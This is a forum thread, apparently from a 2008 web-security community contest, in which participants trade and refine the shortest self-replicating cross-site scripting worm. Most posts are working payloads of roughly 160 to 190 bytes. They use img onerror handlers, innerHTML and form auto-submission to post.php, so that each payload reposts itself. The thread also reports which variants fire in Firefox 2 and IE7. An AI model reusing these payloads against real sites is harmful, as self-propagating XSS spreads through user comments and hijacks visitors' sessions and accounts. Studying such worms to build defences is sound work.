blahblah, which browser is that? i got that error before, but i thought i fixed it.

also, no the browser will navigate to post.php, if you want that happening in the background you need to make tricks with iframes, which adds a whole bunch of bytes.
i suppose we're looking at a very bare-bones worm here.

Firefox, v2.0.0.11

Edit: Happens in IE7 as well.



Edited 1 time(s). Last edit at 01/04/2008 04:24PM by BlahBlah.

@.mario - If you just wrap your form in a <p> ... </p> tag everything works and you don't have to worry about outerHTML in FF2. It would bring your total up to 171, including the missing alert, which is still the leading submission that I have seen.

heh, blahblah i accidentally replicated your bug ;-) you need to remove the newline in my code before inserting. otherwise the firstSibling property is the "\n" textNode.

@Matt: Thx - nice! I am just trying another approach but yet w/o success *g*

Ah, it works now, in FF and IE.

As a side note, in looking at some of the examples, I just realized that this actually fires in Firefox (Not IE though, sorry)... Firefox apparently doesn't require the following information in the src attribute:

<img src onerror="alert('XSS')">

- RSnake
Gotta love it. http://ha.ckers.org

Matt Presson Wrote:
-------------------------------------------------------
> @.mario - If you just wrap your form in a <p> </p>
> tag everything works and you don't have to worry
> about outerHTML in FF2. It would bring your total
> up to 171, including the missing alert, which is
> still the leading submission that I have seen.

Matt, it wouldn't work that easy. because you'd also need to add the <p> tags around the code again, otherwise it won't get replicated in the next generation.
and that would require you to use the quotes again around the onerror handler, because otherwise you can't have the ">" character in your code ..

would *at least* add another 10 bytes, going to 181 .. but i'd rather see it than just count it roughly ;-)

i wanna see a working example otherwise i think barbarianbob's on top :-P

so, rsnake, since you appear the only one willing to fire up IE7 ;-) what is the shortest way to fire an onerror event in an IMG tag?

in other words, which works in IE7:

<img src="/" onerror
<img src="." onerror
<img src=. onerror
<img src=/ onerror
<img src= onerror
<img src onerror

?

<img src=. onerror=[whatever]>

fires in IE7. you can use other things in place of the . too. I couldn't find any shorter ones with IE7

<img src=. and <img src=/ work.

barbarianbob's code doesn't appear to work in IE. "n.content is null or not an object"

I'm probably just doing something wrong again ¬_¬



Edited 1 time(s). Last edit at 01/04/2008 04:40PM by BlahBlah.

In IE7.0:

<img src="/" onerror=alert(1)> works
<img src="." onerror=alert(2)> works
<img src=. onerror=alert(3)> works
<img src=/ onerror=alert(4)> works
<img src= onerror=alert(5)> does not work
<img src onerror=alert(6)> does not work

- RSnake
Gotta love it. http://ha.ckers.org

Tested in FF2 and IE7 (and IE6).

<p><form method=post action=post.php><input name=content>
<script>
alert('XSS');
F=document.forms;f=F[F.length-1];
f.content.value='<p>'+f.parentNode.innerHTML;
f.submit();
</script>

Squeezed into 176 bytes, plus newlines above for readability.

Must be used somewhere inside a valid HTML document, and post.php must be as well. And I'm kinda digging into the DOM. But, the reference is going to be valid regardless of the rest of the page (it's an inline script, so the last member of document.forms will always be this form).

If I understand the real problem space, " action=post.php" could probably be removed, to drop to 160 bytes.

Did I cheat, or is this OK?

well, if barbarianbob's also doesn't work, i guess i'm still in the lead ;-)

my guess would be that IE7 doesn't support accessing form elements through their "name" attribute as properties of the form object.

trying to fix it, leaves me with this 191 byte version:

<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()">
<form method=post action=post.php><input name=content></form></s>

it should work in IE7, but i can't test.

@arantius: who says the form you insert is the last one? (knowledge of the DOM page...)

<b><img src=. onerror=alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form></b>

174 bytes (not sure if it's already old)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@bwb labs:

The page is currently loading, when this script is executing. There is no DOM representing the bytes after this </script> tag, yet.

"action=post.php" can only be removed if the page where the injection *appears* is always post.php.
in a real social network setting, the post-url will probably be addComment.php or something, while the comment itself will appear on userProfile.php .

further, what if the injected code appears somewhere *before* another form in the HTML? say the "add your comment" form at the bottom of the comments list. wouldn't you then need to type F[F.length-2] ?
in other words, i think your entry presumes knowledge about the DOM. though correct me if i'm wrong. -- i stand corrected.

using the auto-closing feature of the p-tag is a nice trick! but, i see another problem with that, what if the injected code is immediately followed by "comment submitted by <i>arantius</i>" as this would also be included in the innerHTML of the p-tag, right? cause the p only auto-closes when it meets a block-level HTML element, IIRC.

and ma1 .. WOW, nice idea of using the with keyword! damn, that's what i meant about having learned to program readable .. using with in any kind of production code is a definite no-no, and i totally forgot about that keyword ;-)



Edited 1 time(s). Last edit at 01/04/2008 04:58PM by ritz.

Bah. I'm buggy in FF.

Another rip-off:

<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>

Note that the additional quotes are used because FF adds them otherwise and the script won't replicate identical* (also changed order of onerror/src & action/method for IE).

188 bytes

* except for case sensitivity: due to FF/IE behaves with tagNames in innerHTML
Tested on FF 2.0.0.11 & IE 7.0.5730.11

and wow^2, i just noticed the bold() trick .. that's pretty awesome.

@ritz:

Ah! That auto-closing-p-tag might actually be my bug ... indeed it is. Changing <p> to <div> fixes, but bumps up to 180 bytes =(

@arantius - also make sure you don't use the knowlege of the DOM, per the rules. No forms[1] or anything like that.

<b><form method=post action=post.php><img src=. onerror=alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form></b>

173 bytes

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

And another really dirty but short ripoff - great one ma1 but nowadays browsers are so good to us lazy developers ;) 166

<b<img src=m onerror=alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()><form method=post action=post.php><input name=content></form</b

Well, I've been beaten but thinking again; I'm not using special knowledge of the DOM, outside that which I myself created, so I think my usage was fine. Sure, I reference document.forms; but only to get a handle to the form I injected myself. I'm not assuming any given structure but my own.

181 bytes, excluding the linebreak

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()">
<form method=post action=post.php><input name=content></form></b>

identical replicate rip-off (code from mal):

<b><form action="post.php" method="post"><img onerror="alert('xss');with(this.parentNode)[0].value=parentNode.innerHTML.bold(),submit()" src=""><input name="content"></form></b>

177 bytes identical replicate cannot do [0] now ..

@mal
tested your code (no [0] ;-) ) on my IE 7 and it fails.



Edited 3 time(s). Last edit at 01/04/2008 05:33PM by bwb labs.

arantius Wrote:
-------------------------------------------------------
> Well, I've been beaten but thinking again; I'm not
> using special knowledge of the DOM, outside that
> which I myself created, so I think my usage was
> fine. Sure, I reference document.forms; but only
> to get a handle to the form I injected myself.
> I'm not assuming any given structure but my own.

i agree with that arantius, i didn't immediately realize the inline script would hold the creation of the DOM tree. indeed a nice trick :)

@rsnake

Quote

2) must self replicate the entire payload

If you use innerHTML you get 'fixed' HTML in FF (so <input name=content> becomes <input name="content">), which length counts? (see my 'identical replicate' moaning) ... also IE changes some order of arguments (although not in my versions since I edited it to IE 'preferred' order) and capitalizes tagNames...